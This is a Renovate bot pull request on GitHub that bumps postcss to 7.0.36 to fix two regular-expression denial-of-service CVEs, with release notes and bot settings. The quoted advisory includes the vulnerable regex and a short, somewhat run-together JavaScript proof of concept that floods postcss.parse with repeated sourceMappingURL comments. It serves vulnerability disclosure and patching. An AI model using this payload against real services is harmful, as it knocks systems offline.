Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

fix(deps): update dependency postcss to v7.0.36 [security] #102

Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open

fix(deps): update dependency postcss to v7.0.36 [security] #102

wants to merge 1 commit into from

Conversation

renovate[bot]
Copy link
Contributor

@renovate renovate bot commented Oct 8, 2023
edited
Loading

This PR contains the following updates:

Package Change Age Adoption Passing Confidence
postcss (source) 7.0.21 -> 7.0.36 age adoption passing confidence

GitHub Vulnerability Alerts

CVE-2021-23368

The npm package postcss from 7.0.0 and before versions 7.0.36 and 8.2.10 is vulnerable to Regular Expression Denial of Service (ReDoS) during source map parsing.

CVE-2021-23382

The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern

\/\*\s* sourceMappingURL=(.*)

PoC

var postcss = require("postcss")
function build_attack(n) {
    var ret = "a{}"
    for (var i = 0; i < n; i++) {
        ret += "/*# sourceMappingURL="
    }
    return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
    if (i % 1000 == 0) {
        var time = Date.now();
        var attack_str = build_attack(i) try {
            postcss.parse(attack_str) var time_cost = Date.now() - time;
            console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
        } catch (e) {
            var time_cost = Date.now() - time;
            console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
        }
    }
}

Release Notes

postcss/postcss (postcss)

v7.0.36

Compare Source

  • Backport ReDoS vulnerabilities from PostCSS 8.

v7.0.35

Compare Source

  • Add migration guide link to PostCSS 8 error text.

v7.0.34

Compare Source

  • Fix compatibility with postcss-scss 2.

v7.0.33

Compare Source

  • Add error message for PostCSS 8 plugins.

v7.0.32

Compare Source

v7.0.31

Compare Source

  • Use only the latest source map annotation (by Emmanouil Zoumpoulakis).

v7.0.30

Compare Source

  • Fix TypeScript definition (by Natalie Weizenbaum).

v7.0.29

Compare Source

  • Update Processor#version.

v7.0.28

Compare Source

  • Fix TypeScript definition (by Natalie Weizenbaum).

v7.0.27

Compare Source

  • Fix TypeScript definition (by Natalie Weizenbaum).

v7.0.26

Compare Source

  • Fix TypeScript definition (by Natalie Weizenbaum).

v7.0.25

Compare Source

  • Fix absolute path support for Windows (by Tom Raviv).

v7.0.24

Compare Source

  • Fix TypeScript definition (by Keith Cirkel).

v7.0.23

Compare Source

  • Update Processor#version.

v7.0.22

Compare Source

  • Add funding link for npm fund.

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate renovate bot force-pushed the renovate/npm-postcss-vulnerability branch from 10065ac to 00fe767 Compare August 6, 2024 08:05
@renovate renovate bot changed the title fix(deps): update dependency postcss to v8 [security] fix(deps): update dependency postcss to v7.0.36 [security] Aug 6, 2024
@renovate renovate bot changed the title fix(deps): update dependency postcss to v7.0.36 [security] fix(deps): update dependency postcss to v7.0.36 [security] - autoclosed Dec 8, 2024
@renovate renovate bot closed this Dec 8, 2024
@renovate renovate bot deleted the renovate/npm-postcss-vulnerability branch December 8, 2024 18:45
@renovate renovate bot changed the title fix(deps): update dependency postcss to v7.0.36 [security] - autoclosed fix(deps): update dependency postcss to v7.0.36 [security] Dec 8, 2024
@renovate renovate bot reopened this Dec 8, 2024
@renovate renovate bot force-pushed the renovate/npm-postcss-vulnerability branch from 251a307 to 00fe767 Compare December 8, 2024 22:41
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
0 participants